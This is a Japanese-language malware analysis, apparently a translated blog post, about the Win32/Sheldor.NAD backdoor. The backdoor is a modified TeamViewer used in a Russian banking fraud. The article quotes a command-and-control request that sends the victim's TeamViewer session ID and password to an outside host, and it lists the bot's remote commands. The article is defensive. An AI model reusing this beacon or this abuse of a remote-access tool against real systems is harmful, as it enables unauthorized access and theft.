Win32 / Sheldor.NADバックドアのコンポーネントとしてのTeamViewer

最近、ESETのアナリストが興味深いマルウェア-Win32 / Sheldor.NADを発見しました。これは、リモートコンピューター管理用の一般的なソフトウェアであるTeamViewerを修正したものです。



この情報は、事件の調査の一環として調査中に取得され、Group-IBによって開始され、リモートバンキングシステムの不正に関連していました。 同時に、攻撃者はいくつかの偽のトランザクションを実行し、約500万ルーブルを盗みました。



Win32 / Sheldor.NAD-トロイの木馬インストーラーを使用してインストールされます。このインストーラーは、リモート管理用の一般的なパッケージの修正版-5番目のバージョンのTeamViewerをシステムに導入します。 さらに、多くのコンポーネントには正当なデジタル署名が含まれています。



画像



実際、この修正版ではすべての変更がtv.dllモジュールに含まれているため、このバックドアを発見したとき、ほとんどのウイルス対策ソリューションは単純にそれに気づきませんでした。



画像



これで状況は改善されました-http://www.virustotal.com/file-scan/report.html? id= 9f3ff234d5481da1c00a2466bc83f7bda5fb9a36ebc0b0db821a6dc3669fe4e6-1295272165



悪意のあるプログラムをインストールした直後に、サーバー部分が起動し、その後、いつでも感染したコンピューターに接続し、悪意のあるプログラムを起動または監視したアカウントのユーザーの権限でアクションを実行できるサイバー犯罪者の管理パネルとの継続的な対話があります。



画像



管理パネルと感染したマシン間の情報交換は、主に次のとおりです。



GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP / 1.1

ユーザーエージェント:x3

ホスト:goeiuyi.net



id = 414 034 883フィールドは、TeamViewerネットワーク上のセッション識別子であり、 pwd = 6655はパスワードです。 これらの2つの識別子を使用すると、世界中のどこからでもリモートコンピューターにシームレスに接続できます。 戻るボットは、コントロールセンターから次のコマンドを受信できます。



exec -winapi関数ShellExecute ()を呼び出します

power_off- EWX_POWEROFFパラメーターを指定してwinapi関数ExitWindowsEx ()を呼び出します

シャットダウン -EWX_SHUTDOWNパラメーターを指定してwinapi関数ExitWindowsEx ()を呼び出します

killbot-インストールされているすべてのファイルを削除し、作成されたレジストリキーを消去します



画像



TeamViewerプログラムでは、システム管理者に非常に人気があり、すぐにトリックを疑うことはできないため、攻撃者の選択は偶然ではありませんでした。 さらに、リモートコンピューターへの接続はTeamViewerの中間サーバーを介して行われるため、攻撃者は接続元のIPアドレスを隠すことができます。 TeamViewerプログラムの開発者に必要なデータを要求する手順はかなり迅速であり、数か月かかることがあるため、これにより調査の証拠も少なくなります。



All Articles